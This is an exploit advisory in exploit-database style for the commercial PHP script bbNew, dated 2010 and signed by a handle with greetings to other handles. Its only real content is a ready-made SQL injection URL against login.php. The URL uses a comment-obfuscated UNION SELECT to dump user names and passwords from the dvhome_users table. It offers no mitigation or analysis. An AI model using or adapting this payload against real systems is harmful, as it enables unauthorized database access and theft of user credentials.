# Exploit Title: bbNew admin.php SQL Injection
# Date: 17.02.2010
# Author: Easy Laster
# Tested on: windows xp

 ########################################################################
 ##bbNew admin.php SQL Injection                                       ##
 ########################################################################
 ########################################################################
 ## _                     _     _                   _                  ##
 ##| |_ ___ ___ _____ ___|_|___| |_ ___ ___ ___ ___| |_                ##
 ##|  _| -_| .'|     |___| |   |  _| -_|  _|   | -_|  _|               ##
 ##|_| |___|__,|_|_|_|   |_|_|_|_| |___|_| |_|_|___|_|                 ##
 ##                                                                    ##
 ########################################################################
##########################################################################
#Script: bbNew admin.php SQL Injection                                   #
#Vulnerabilities [ SQL Injection ]                                       #
#Language: [ PHP ]                                                       #
#Download: [ buy this script ]                                           #
#Founder: [ ea$y laster ]                                                #
#Peace to [ -tmh- ,0qwl ,Crypter ,Dr.ChAoS ,dremicz ,eddy14 ,HANNIBAL ]  #
#[ Lidloses_Auge ,n00bor, Rip ,Sens0r ,-=Player=- silent vapor]          #
#Price: [ Commercial License EUR unknown                                 #
##############################################################################
http://www.target.com/path/login.php?operate=login&input_name='/**/union/    #
**/select/**/null,null,name,null,password,null,null,null,null,n ull,null,null#
,null,null,null,null,null,null,null,n ull,null,null,null,null,null,null,null #
,null,null,null,null,null,null,null,null,null,null/**/from/**/dvhome_users-- #
##############################################################################